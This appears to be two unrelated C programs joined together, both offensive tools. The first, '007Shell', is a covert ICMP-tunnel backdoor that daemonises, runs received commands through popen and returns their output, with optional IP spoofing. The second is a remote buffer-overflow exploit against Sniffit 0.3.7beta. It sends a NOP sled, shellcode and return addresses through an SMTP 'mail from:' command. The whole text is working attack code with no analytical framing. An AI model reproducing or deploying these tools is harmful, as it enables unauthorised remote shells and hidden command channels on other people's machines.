int main(int argc, char **argv)
{
char data[MAXMESG] ;
char recvdata[MAXMESG+BUFFSIZE] ;
char senddata[MAXMESG+BUFFSIZE] ;
int opt, off = 0, n, i ;
int srvr = 0, clnt = 0 ;
int pid, ret ;
u_long hostaddress, cliaddress ;
char buf[BUFFSIZE] ;
char buf2[BUFFSIZE] ;
FILE *job ;
if (argc < 2) usage(argv[0]);
while ((opt = getopt(argc, argv, "sch:S:")) != EOF) {
switch(opt)
{
case 's':
srvr++;
break;
case 'c':
clnt++;
break;
case 'h':
hostaddress = nameResolve(optarg);
break;
case 'S':
ip_spoof = YEAH;
spoof_addr = nameResolve(optarg);
break;
default:
usage(argv[0]);
}
}
if (srvr)
strcpy(argv[0], "007Shell v.1.0 - Good Luck James ...");
if (!hostaddress && clnt) {
fprintf(stderr, "\n\033[0;5;31mYou must specify the server address\033[0m\n\n");
exit(0);
}
if (clnt && !srvr) {
printf("\033[0;32m007Shell v.1.0 - Let's Dig Covert !\033[m\n");
while (!ferror(stdin) && !feof(stdin)) {
bzero(senddata, sizeof(senddata));
bzero(recvdata, sizeof(recvdata));
printf("\033[0;32m[covert@007Shell]# \033[0m");
if (fgets(data, MAXMESG, stdin) == NULL)
break;
data[strlen(data)-1] = 0;
if(strstr(data, OFFLINE)) off = 1 ;
strcat(senddata, data);
if(ip_spoof == NOPE) {
if( ICMP_send(senddata, strlen(senddata), hostaddress, 0, 0) < 0) {
perror("\033[0;5;31mTunnel_Send: \033[0m");
exit(0);
}
if (off && clnt) {
ICMP_reset();
printf("\033[0;32mSee ya Covert, James ...\033[0m\n");
exit(0);
}
while(1) {
memset(recvdata, '\0', strlen(recvdata));
if((n=ICMP_recv(recvdata, MAXMESG, REPLY)) != -666) {
printf("%s", recvdata);
} else break;
}
}
if(ip_spoof == YEAH) {
if( ICMP_sp_send(senddata, strlen(senddata), hostaddress,
spoof_addr) < 0) {
perror("\033[0;5;31mTunnel_Send: \033[0m");
exit(0);
}
if (off && clnt) {
ICMP_reset();
printf("\033[0;32mSee ya Covert, James ...\033[0m\n");
exit(0);
}
}
}
}
else if(srvr && !clnt) {
pid = fork();
if (pid != 0) {
printf("\033[0;32m007Shell v.1.0 - Let's Go Covert !\033[0m\n");
exit(0);
}
setsid();
chdir(ROOTDIR);
umask(0);
while(!off) {
ret = 0;
bzero(senddata, sizeof(senddata));
bzero(recvdata, sizeof(recvdata));
if((n=ICMP_recv(recvdata, MAXMESG, 0)) < 0) {
perror("\033[0;5;31mTunnel_Recv: \033[0m");
exit(0);
}
cliaddress = clisrc.sin_addr.s_addr;
if(strstr(recvdata, OFFLINE)) {
ICMP_reset();
exit(0);
}
if (!(job = popen(recvdata, "r"))) {
perror("\033[0;5;31Popen: \033[0m");
exit(0);
}
while(fgets(buf, BUFFSIZE-1, job)) {
ret++;
bcopy(buf, buf2, BUFFSIZE);
ICMP_send(buf2, strlen(buf2), cliaddress, REPLY, 0);
}
ICMP_send("", 0, cliaddress, 0, LAST);
pclose(job);
fflush(NULL);
}
}
ICMP_reset();
exit(1);
}
int main(int argc,char **argv)
{
char buff[LENGTH+ALIGNOP+1];
char cmd[610];
long addr;
unsigned long sp;
int offset=OFFSET;
int i, x;
int sock;
struct sockaddr_in sin;
if(argc<2) {
fprintf(stderr, "Usage: %s <sniffit host>\n", argv[0]);
exit(0);
}
sp=(unsigned long) RET;
addr=sp-offset;
for(i=0;i<120-ALIGNOP;i++)
buff[i]=0x90;
for(x=0; x<strlen(shellcode); i++, x++)
buff[i]=shellcode[x];
for(i-=1 ; i<LENGTH; i+=4) {
buff[i ] = addr & 0x000000ff;
buff[i+1] = (addr & 0x0000ff00) >> 8;
buff[i+2] = (addr & 0x00ff0000) >> 16;
buff[i+3] = (addr & 0xff000000) >> 24;
}
printf("\nSniffit <=0.3.7beta Linux/x86 Remote Exploit\n");
printf("by FuSyS [S0ftpj|BFi] - http://www.s0ftpj.org\n\n");
memset(&sin,0,sizeof(sin));
sin.sin_family=AF_INET;
sin.sin_port=htons(25);
sin.sin_addr.s_addr=nameResolve(argv[1]);
printf("Connecting to %s ...\n", argv[1]);
if((sock=socket(AF_INET,SOCK_STREAM,0))<0)
{
printf("Can't create socket\n");
exit(0);
}
if(connect(sock,(struct sockaddr *)&sin,sizeof(sin))<0)
{
printf("Can't connect to Sniffit Server\n");
exit(0);
}
printf("Injecting ShellCode ...\n");
strncat(cmd, "mail from:", 10);
strncat(cmd, buff, strlen(buff));
write(sock, cmd, strlen(cmd));
printf("Done!\n\n");
return(0);
}
